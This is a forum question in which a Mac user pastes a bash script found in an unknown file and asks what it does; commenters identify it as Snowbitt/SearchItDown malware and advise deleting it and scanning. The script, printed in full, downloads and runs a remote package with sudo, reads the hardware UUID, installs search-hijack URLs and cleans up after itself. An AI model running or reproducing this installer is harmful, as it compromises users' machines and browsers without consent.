# Weird Command Lines

Tags: macos, command, command-prompt

What does this code do? Thanks!

```
Davids-MacBook-Pro:~ David$ cat /file
#!/bin/bash
func_4(){
/bin/mkdir -p /var/tmp
/usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.installwizz.com/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

COUNTRY="DE"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] || [ "$COUNTRY" == "NZ" ]\
|| [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] || [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
|| [ "$COUNTRY" == "DE" ]; then
sudo ./setup.sh "http://www.searchitdown.com/?n=091&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/?n=091&searchsource=69&UM=8&gd=SY1000653" "http://www.searchitdown.com/Results.aspx?n=091&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd" "http://i.installwizz.com/c/cc?id="
else
sudo ./setup.sh "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp&type=YHS_TGE_bf05da&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=nt&type=YHS_TGE_bf05da&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&type=TGE_bf05da" "snowbitt" "upd" "http://i.installwizz.com/c/cc?id="
fi

CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
/usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.installwizz.com/is/if?i="
fi

func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
func_taaVqst &

}
func_4 &
Davids-MacBook-Pro:~ David$
```

This code was drawn from an unknown file that was on my hard drive, I just opened it and none of the code was visible. I used cat /file (file is the file name) to get this code.

Comment: Looks like a shell script to install some malware (Snowbitt/SearchItDown).

Comment: can i remove it safely?

Comment: Yes. A file placed in your root named `/file` isn't a particularly important file. You may also want to run [Malwarebytes](https://www.malwarebytes.com/mac/) to scan your Mac for malware.

Comment: https://apple.stackexchange.com/questions/368733/what-is-this-random-file-in-macintosh-hd-malicious